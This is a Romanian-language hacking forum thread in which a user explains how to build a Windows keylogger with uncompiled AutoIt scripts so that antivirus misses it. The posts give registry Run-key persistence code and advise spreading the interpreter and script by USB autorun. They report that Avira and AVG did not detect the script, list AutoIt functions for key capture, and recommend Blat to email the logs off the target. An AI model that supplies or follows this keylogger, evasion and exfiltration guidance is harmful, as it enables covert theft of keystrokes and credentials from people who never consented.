Jump to content
pyth0n3

Fast/Keylogger Windows [AutoIt- Self Extracting Archive]

Recommended Posts

E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.

Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .

Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .

Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.

Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.

Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp

AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX)

  • Upvote 1
Link to comment
Share on other sites

E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.

Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .

Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .

Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.

Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.

Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp

AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX)

Salut,

Nice nu am incercat niciodata.

O zi buna.

Link to comment
Share on other sites

Pai arhiva o luati de pe site-ul oficial autoit

39772101.jpg

Scoateti toate fisierele inafara de interpretul care executa scripturile

Creati un script care logheaza si faceti in in asa fel incat pe sistemul target sa se afle interpretul si scriptul care l-ati facut

Faceti in asa fel incat userul sa execute scriptul folosind interpretul autoit

Putina imaginatie!

N.B. Faceti in asa fel incat scriptul sa porneasca automat de fiecare data cand porneste calculatorul

Cod pentru autostartup


run(@WindowsDir&"\logyourfinger.au3")

RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "keyup","REG_SZ", @WindowsDir&"\logyourfinger.au3")

Hint: Stick-urile USB Cruser executa un script in automat (autorun) , faceti in asa fel incat sa execute scriptul vostru si sa copie interpretul in computerul target cand vin introduse in pc.

Un script transformat in .exe a fost detectat

Acelasi script cu extensia .au3 nu la detectat

Testul l-am facut doar in target-uri care rulau Avira si AVG , dar nu ar trebui sa fie detectat deoarece sunt intructii care inca nu sunt compilate

Later Edit:

Cateva functii care poate fi de folos:

TraySetState

_IsPressed

_FileCreate

FileWrite

FileDelete

Mai pun si cireasa pe tort , o sa aveti nevoie de ea

Blat - A Win32 Command Line SMTP Mailer

Edited by pyth0n3
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...